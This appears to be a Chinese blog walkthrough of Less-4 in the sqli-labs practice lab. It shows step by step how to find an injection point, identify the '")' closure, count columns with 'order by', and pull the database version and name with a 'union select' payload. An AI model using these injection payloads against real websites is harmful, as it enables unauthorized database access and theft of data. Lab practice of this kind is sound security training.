SQL注入靶场sqli-labs less-4

sqli-labs靶场第三关less-4

1、确定注入点

http://192.168.128.3/sq/Less-4/?id=1

http://192.168.128.3/sq/Less-4/?id=2

有不同回显,判断可能存在注入,

2、判断注入类型

输入

http://192.168.128.3/sq/less-4/?id=1 and 1=1

http://192.168.128.3/sq/less-4/?id=1 and 1=2

回显一致,猜测不是数字型注

加单引号

http://192.168.128.3/sq/less-4/?id=1'

没有回显,猜测其他闭合方式

输入双引号

http://192.168.128.3/sq/Less-4/?id=1"

报出错误

由结果判断闭合方式为 ")

3、确定列数

http://192.168.128.3/sq/less-4/?id=1") order by 5 --+

http://192.168.128.3/sq/less-4/?id=1") order by 4 --+

http://192.168.128.3/sq/less-4/?id=1") order by 3 --+

4,5回显报错,3的时候回显

确定列数为3

4、确定回显位

http://192.168.128.3/sq/less-4/?id=-1") union select 1,2,3 --+

确定2,3为回显位置

5、确定数据库名,数据库版本

http://192.168.128.3/sq/Less-4/?id=-1") union select 1,version(),database()--+

5、爆出数据库名,表名,列名,数据

最终得到数据

大功告成

相关推荐
老华带你飞14 分钟前
口腔助手|口腔挂号预约小程序|基于微信小程序的口腔门诊预约系统的设计与实现(源码+数据库+文档)
java·数据库·微信小程序·小程序·论文·毕设·口腔小程序
hqxstudying24 分钟前
J2EE模式---服务层模式
java·数据库·后端·spring·oracle·java-ee
Yu_Lijing26 分钟前
MySQL进阶学习与初阶复习第四天
数据库·学习·mysql
大熊程序猿41 分钟前
net8.0一键创建支持(Orm-Sqlite-MySql-SqlServer)
数据库·mysql·sqlite
hqxstudying3 小时前
Java异常处理
java·开发语言·安全·异常
-SGlow-9 小时前
MySQL相关概念和易错知识点(2)(表结构的操作、数据类型、约束)
linux·运维·服务器·数据库·mysql
明月56610 小时前
Oracle 误删数据恢复
数据库·oracle
终焉暴龙王11 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
♡喜欢做梦12 小时前
【MySQL】深入浅出事务:保证数据一致性的核心武器
数据库·mysql
遇见你的雩风12 小时前
MySQL的认识与基本操作
数据库·mysql